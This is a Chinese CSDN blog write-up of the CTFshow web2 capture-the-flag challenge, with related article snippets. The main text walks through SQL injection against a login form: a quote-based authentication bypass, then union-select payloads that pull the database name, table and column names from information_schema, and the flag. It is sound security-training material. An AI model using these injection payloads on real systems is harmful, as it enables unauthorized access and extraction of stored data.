CTFshow-web-web2

最新推荐文章于 2024-05-01 02:50:55 发布
最新推荐文章于 2024-05-01 02:50:55 发布
阅读量174 收藏
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_68581192/article/details/133654117
版权

CTFshow-web-web2

打开靶场,显示如下
在这里插入图片描述
尝试输入1‘ or 1=1 # 显示如下,登陆成功
在这里插入图片描述
利用联合注入,1‘ union select 1,2,3 # 显示如下,回显字段为2
在这里插入图片描述
查找数据库名称,猜测是2的位置,输入1’ union select 1,database(),3 # 显示如下
在这里插入图片描述
利用已知的数据库名称,寻找里面的信息,输入1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘web2’),3 # (需要自己输入一下,复制的可能不行)显示如下
在这里插入图片描述
获取flag表的字段,输入1’ union select 1, (select group_concat(column_name) from information_schema.columns where table_schema=‘web2’ and table_name=‘flag’) ,3 # 显示如下 发现只有一个字段
在这里插入图片描述
获取flag表的数据,1’ union select 1,(select flag from flag),3 # 显示如下
在这里插入图片描述

T大白兔奶糖
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow web-2(sql注入)
m0_73303597的博客
11-21 1833
自用
ctfshow-WEB-web2
热门推荐
wangyuxiang946的博客
08-19 1万+
ctf.show WEB模块第2关是一个SQL注入漏洞,请求方式是POST请求,注入点是单引号字符型注入,flag就藏在当前的数据库的flag表中,使用联合注入获取数据即可 在用户名的输入框中输入万能账号a' or true #,密码随便输 登录成功,万能账号生效了,并且把查询到的用户名显示到了页面中,既然有显示位,那我们就用联合注入进行脱库 首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输 a' union select 1,2...
2024年ctfshow-WEB-web2_ctf
最新发布
2401_84252281的博客
05-01 190
首先,测试一下回显的位置,在用户名的输入框中输入一下payload,密码还是随便输接下来,我们修改payload中2的位置,就可以将数据回显到页面中了,下面获取当前使用的数据库,盲猜flag就藏在当前使用的数据库中数据库有了,接下来是脱表,在用户名的输入框中输入一下payload,密码还是随便输接下来获取flag表的字段接下来获取flag表的数据。
ctfshow web2
m0_63253040的博客
03-12 1683
打开环境是一个登入页面, 题目提示:最简单的SQL注入,那么先试一试万能密码登入 ' or 1=1# 密码随便输 存在回显,直接sql注入 ' or 1=1 order by 3# 正常回显,爆到4时不回显 ' or 1=1 order by 4# 开始爆库名 ,先看看是哪个位置会回显 ' or 1=1 union select 1,2,3# 发现是可以不用输密码的 ' or 1=1 union select 1,database(),3# 得到库...
CTF秀web2
天天学安全专属博客
11-20 965
CTF秀web2,union注入详解
ctfshow web入门——web2
m0_74093152的博客
01-28 256
ctfshowweb入门——web2
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFShow-周末大挑战parse-url篇Writeup
05-19
这篇Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
ctfshow-web2(SQL注入)
Welcome To Myon'Blog !
10-07 486
mysql数据库、web2数据库以及其他所有数据库的所有信息都会储存在information_schema这个数据库下,这也是为什么我们可以借助information_schema这个数据库来查询到其他数据库的信息。这里说一下,因为mysql 5.0及其以上的都会自带一个叫information_schema的数据库,相当于是一个已知的数据库,并且该数据库下储存了所有数据库的所以信息。前面我们说过,information_schema这个数据库下面包含了所有数据库的所有信息。成功闭合之后先判断字段数。
CTFshow:WEB2
精神大火的博客
03-21 1481
该题考察SQL注入漏洞,之前对SQL注入仅有部分了解,通过该题进行复习深入。
ctfshow_WEB_web2 wp
Altering_Ji的博客
04-23 528
ctfshow WEB类题目web2,最简单的SQL注入,writeup
ctfshow之web2
夜未至
03-21 271
本人开了一个知识星球,在星球里每天更新网络安全的文章,其中包含在安全中用到的工具和脚本,分享全国职业技能大赛的相关具体细节及解题思路,在星球中有问必答。然后在地址栏回车,就可以查看网页源代码了,获取到flag:ctfshow{42393163-8074-436c-8383-425d3bd989b6}同样也是开发人员忘记了在发布版本去掉那些注释,只不过web2里禁用了右键检查而已,查看源代码的方式还是有很多,总结:前端验证都是不安全的验证。
CTF-show WEB入门--web2
m0_73912575的博客
10-25 227
CTF.show WEB入门--web2 解题write up
JavaScript学习笔记(二十)DOM动画效果
2401_84254011的博客
04-28 465
/0 ~ 100}else{//100// 3. 速度取整;}else{}else{// 4. 终止条件;} , 50)
ctfshow-web2
HAI_WD的博客
07-24 299
知道这里是sql注入,确认一下是什么类型的闭合。可以知道闭合是单引号闭合,然后查一下显示的位数。这道题很多wp,但是为了完整性还是写一下。然后知道库了之后,锁定一下数据表。
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值